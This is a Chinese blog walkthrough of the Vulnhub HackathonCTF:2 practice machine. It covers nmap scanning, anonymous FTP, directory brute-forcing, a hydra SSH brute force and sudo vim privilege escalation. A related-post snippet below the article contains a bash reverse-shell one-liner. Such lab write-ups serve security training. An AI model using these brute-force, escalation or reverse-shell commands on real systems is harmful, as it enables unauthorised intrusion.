Vulnhub-HACKATHONCTF: 2渗透

已于 2024-01-10 22:48:09 修改
阅读量1.1k 收藏 25
点赞数 30
分类专栏: Vulnhub靶机渗透 文章标签: 网络安全 网络 安全 安全威胁分析 计算机网络
于 2024-01-06 15:51:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laoyanCZ/article/details/135225649
版权

文章目录

一、前言

由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
 如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!

 👉本文靶机下载连接-戳我直接下载!👈

1、靶机ip配置

  • Kali IP:192.168.100.35
  • 靶机IP:192.168.100.38靶机ip获取方式如下图
    在这里插入图片描述

2、渗透目标

  • 获取flag1.txt文件的内容
  • 获取到/root/目录下的flag2.txt文件

3、渗透概括

  1. ftp信息获取
  2. web目录扫描
  3. ssh爆破
  4. vim提权

开始实战

一、信息获取

使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP如下所示
在这里插入图片描述

可以看到,开放的端口有21/ftp 80/http 7223/ssh
21/ftp根据扫描的信息可以看到该ftp服务上有两个文件flag.txtword.dir等一下用匿名用户把这个两个文件下载下来看看是个什么情况
80/http基本上大部分的漏洞都是存在于web服务上
7223/ssh靶机的作者把ssh端口给改了,ssh可以直接pass掉了,这个版本基本上没有什么可利用的漏洞了,一般获取到了用户信息才使用这个

我们先看看21/ftp服务,使用匿名用户anonymous登录(密码随便填)
在这里插入图片描述

我们查看这两个文件,获取到了一个flag和一个可能是密码的字典文件,这个字典文件可能会用于后续的爆破
在这里插入图片描述

我们再看到该靶机的web服务,是一个图片,还有两个超链接(打不开)
在这里插入图片描述

二、web目录爆破

我们用gobuster工具对web目录爆一下,如下图,发现了一个可疑的目录/happy

gobuster dir -u http://192.168.100.38/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x jpg,php,txt,html

在这里插入图片描述

我们访问一下爆出来的/happy目录,如下图
虽然信息告诉我们这儿啥也没有,但是我们按f12审查该页面源码可以看到一个账号hackathonll
在这里插入图片描述

三、ssh爆破

结合我们拿到账号hackathonllword.dir字典可以尝试用hydra工具对该靶机的ssh服务爆破一下
如下图,可以看到爆出hackathonll用户的密码为Ti@gO

hydra -l hackathonll -P word.dir -t 32 -s 7223 192.168.100.38 ssh

在这里插入图片描述

我们通过获取到的账户密码就可以成功登录该靶机7223端口上的ssh服务
在这里插入图片描述

四、提权

我们用sudo -l命令查看一下权限,发现vim命令是不需要密码就可以用root的权限运行
在这里插入图片描述

我们仅需要使用sudo vim -c ':!/bin/sh'命令就可以提权到root
在这里插入图片描述

我们使用cd ~命令到root的家目录,如下图可以看到flag文件flag2.txt,并且使用cat命令查看即可
在这里插入图片描述

疯狂搞网安的18岁老登
关注
  • 30
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
vulnhub--HackathonCTF:2
venu_s的博客
06-22 297
靶机介绍 difficult:easy goal:get two flags download:https://www.vulnhub.com/entry/hackathonctf-2,714/ 信息探测 主机发现 端口扫描 查看端口的的详细信息,21端口可以使用anonymous身份登陆,有flag1.txt和word.dir两个文件;7223是ssh端口 目录扫描,有一个/happy 访问80端口,没什么发现,查看源代码,也没什么发现 访问/happy 查看源码,发现一个用户名 至此,网页的
渗透靶场--HackathonCTF 2
weixin_45794666的博客
07-20 563
HackathonCTF 2 1.首先nmap扫描获得ip 2.扫描全端口并记录信息 nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 192.168.19.141 3.可以看到ftp上匿名用户可以得到flag1.txt和word.dir 4.那么接下来就是利用这个字典爆破ssh 5.还有一个80端口,目录扫描得到一个happy目录,查看源代码获取到用户名 6.hydra ssh爆破 hydra -l hackathonll -P word.dir
靶机渗透练习86-HackathonCTF 2
hirak0的博客
04-29 622
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackathonctf-2,714/ Description Difficulty: Easy This is a basic level BootToRoot machine for beginners. There are two flags. After finding the flag, tag me on Twitter(@Markme_1). 一、搭建靶机环境 攻击机Kali: IP地址:192.168.12
HACKATHONCTF 2靶机
logan_logan的博客
07-19 235
1.端口扫描 端口扫描发现FTP可以匿名登录,同时SSH登录端口被改为7223; 2.匿名登录FTP 登录成功之后发现两个文件,下载到本地进行打开; word.dir文件是以dir为后缀结尾,猜测这个文件是目录字典; 3.目录扫描 使用这个文件作为目录字典进行枚举; 成功枚举出happy目录,在网页打开,发现了一个用户名; 4.暴力破解 使用这个用户hackathonll进行暴力破解登录,尝试了好几个字典,最后还是用这个word.dir文件成功得出密码; 成功登录之后使用sudo -l发现vim可
Vulnhub-HACKATHONCTF 2渗透(1),网络安全自定义View详解
2401_84102979的博客
04-04 908
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**薪资区间6k-15k。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
2024年网络安全最新Vulnhub-HACKATHONCTF 2渗透
2401_84297899的博客
05-01 34
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
网络安全领域,VulnHub 是一个深受爱好者和专业人员欢迎的平台,它提供了一系列虚拟机(VM)镜像,用于模拟真实的网络环境,帮助用户提升漏洞利用和渗透测试的技能。本篇文章将深入探讨名为 "Alienum" 的 VulnHub ...
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
vulnhubHACKATHONCTF: 1
weixin_44537595的博客
11-05 683
靶场:http://www.vulnhub.com/entry/hackathonctf-1,591/ 查看对方的主机mac地址 我们用我们的kali进行存活主机扫描 命令:nmap -sS -sC -sV -p1-10000 192.168.25.0/24 搜索到对方主机的ip地址为 192.168.25.84 3. 扫描对方所开放的端口及一些其他信息,并保存/tmp/下,文件名为nmap.txt 命令:nmap -A 192.168.25.84 -o /tmp/nmap.txt 4
网站目录爆破工具
08-09
python编写的网站目录爆破 python dirscan.py 输入url 线程数 字典文件即可
【打靶记录】VulnHub-stapler靶机渗透wp
qq_39972370的博客
02-12 1160
这是一个适合初学者到中级水平的虚拟机。它有一些挑战,但不会过于复杂。至少有两条路径可以获得一个有限权限的shell。至少有三种方法可以获得root权限。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 4359
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
目录扫描工具-Dirsearch
andiao1218的博客
01-18 3045
下载项目,并打开 ┌─[root@sch01ar]─[/sch01ar] └──╼ #git clone https://github.com/maurosoria/dirsearch ┌─[root@sch01ar]─[/sch01ar] └──╼ #cd dirsearch/ 运行需要python3环境 ┌─[root@sch01ar]─[/...
环境变量设置,网络安全入门你值得拥有
2401_84281720的博客
04-27 373
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 961
任务环境说明:服务器场景:Server1。
插件分享 | 可进行 Web 路径爆破的 Dirsearch
m0_46699477的博客
05-28 1408
前言: Dirsearch 是一款成熟的命令行工具,旨在暴力扫描页面结构,包括网页中的目录和文件。当我们在使用 Goby 扫描时,有一些网站打开是空白页面或者直觉告诉我们没有这么简单的页面,这时通过目录扫描或许能发现不一样的惊喜(网站后台、未授权访问页面等等),Dirsearch 插件助你能够更便捷的发现这些惊喜。 0x001 插件效果 1.1 插件使用 下载插件并配置 dirsearch.py、python3 路径或命令。接下来就可以在ip详情页跟 webfinder 页面使用 dirsearch。扫.
dirb工具(Web目录爆破)
墨痕诉清风的博客
05-30 1756
help -a <agent_string> : 指定您的自定义 USER_AGENT。 -b : 按原样使用路径。 -c <cookie_string> : 为 HTTP 请求设置一个 cookie。 -E <certificate> : 客户端证书的路径。 -f : ...
web安全:网站子目录爆破+beef工具介绍
平平无奇
08-18 2489
一. 网站子目录爆破工具 1.dirbuster,kali系统自带界面,使用起来非常简单 字典目录/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 2.dirb https://www.baidu.com 二、beef工具 1.kali系统自带beef工具,启动之后就可以生成web端的使用界面,还有一个hook.js脚本页面,将...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

疯狂搞网安的18岁老登

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值